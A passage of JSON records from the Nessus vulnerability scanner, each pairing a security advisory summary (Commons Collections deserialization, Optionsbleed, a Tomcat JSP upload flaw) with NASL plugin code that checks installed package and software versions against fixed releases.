or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2522\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", 
reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:15", "description": "From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. 
Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2521 and \n# Oracle Linux Security Advisory ELSA-2015-2521 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87118);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)\");\n script_summary(english:\"Checks rpm output for the updated 
packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005595.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:35", "description": "Hanno Bock discovered that the Apache HTTP Server incorrectly handled Limit directives in .htaccess files. In certain configurations, a remote attacker could possibly use this issue to read arbitrary server memory, including sensitive information. This issue is known as Optionsbleed.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Apache HTTP Server vulnerability (USN-3425-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-bin", "p-cpe:/a:canonical:ubuntu_linux:apache2-data", "p-cpe:/a:canonical:ubuntu_linux:apache2-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-custom", "p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-pristine", "p-cpe:/a:canonical:ubuntu_linux:apache2-utils", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-macro", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-proxy-html", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:apache2"], "id": "UBUNTU_USN-3425-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3425-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103356);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"USN\", value:\"3425-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Apache HTTP Server vulnerability (USN-3425-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Hanno Bock discovered that the Apache HTTP Server incorrectly handled\nLimit directives in .htaccess files. In certain configurations, a\nremote attacker could possibly use this issue to read arbitrary server\nmemory, including sensitive information. This issue is known as\nOptionsbleed.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3425-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-custom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-suexec-pristine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-macro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-proxy-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! 
get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'apache2', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-bin', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-data', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-dev', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-event', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-itk', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-prefork', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-mpm-worker', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec-custom', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-suexec-pristine', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2-utils', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'apache2.2-bin', 'pkgver': '2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'libapache2-mod-macro', 'pkgver': '1:2.4.7-1ubuntu4.18'},\n {'osver': '14.04', 'pkgname': 'libapache2-mod-proxy-html', 'pkgver': '1:2.4.7-1ubuntu4.18'},\n {'osver': '16.04', 'pkgname': 'apache2', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-bin', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-data', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-dev', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-suexec-custom', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': 
'16.04', 'pkgname': 'apache2-suexec-pristine', 'pkgver': '2.4.18-2ubuntu3.5'},\n {'osver': '16.04', 'pkgname': 'apache2-utils', 'pkgver': '2.4.18-2ubuntu3.5'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache2 / apache2-bin / apache2-data / apache2-dev / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:39", "description": "According to its banner, the version of Apache running on the remote host is 2.4.x prior to 2.4.28. 
It is, therefore, affected by an HTTP vulnerability related to the <Limit {method}> directive in an .htaccess file.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-13T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_28.NASL", "href": "https://www.tenable.com/plugins/nessus/103838", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103838);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n\n script_name(english:\"Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. 
It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.4.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.28 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, 
Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nconstraints = [\n { \"min_version\" : \"2.4\", \"fixed_version\" : \"2.4.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:36", "description": "The version of Apache Tomcat installed on the remote host is 7.0.x prior to 7.0.82. It is, therefore, affected by an unspecified vulnerability that, when running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false), makes it possible to upload a JSP file to the server via a specially crafted request. 
This JSP could then be requested and any code it contained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "nessus", "title": "Apache Tomcat 7.0.x < 7.0.82 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12617"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_82.NASL", "href": "https://www.tenable.com/plugins/nessus/103782", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103782);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-12617\");\n script_bugtraq_id(100954);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Apache Tomcat 7.0.x < 7.0.82 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 7.0.x\nprior to 7.0.82. It is, therefore, affected by an unspecified\nvulnerability when running on Windows with HTTP PUTs enabled (e.g. via\nsetting the readonly initialization parameter of the Default to false)\nmakes it possible to upload a JSP file to the server via a specially\ncrafted request. 
This JSP could then be requested and any code it\ncontained would be executed by the server.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n # http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.82\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbdfd5cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.82 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 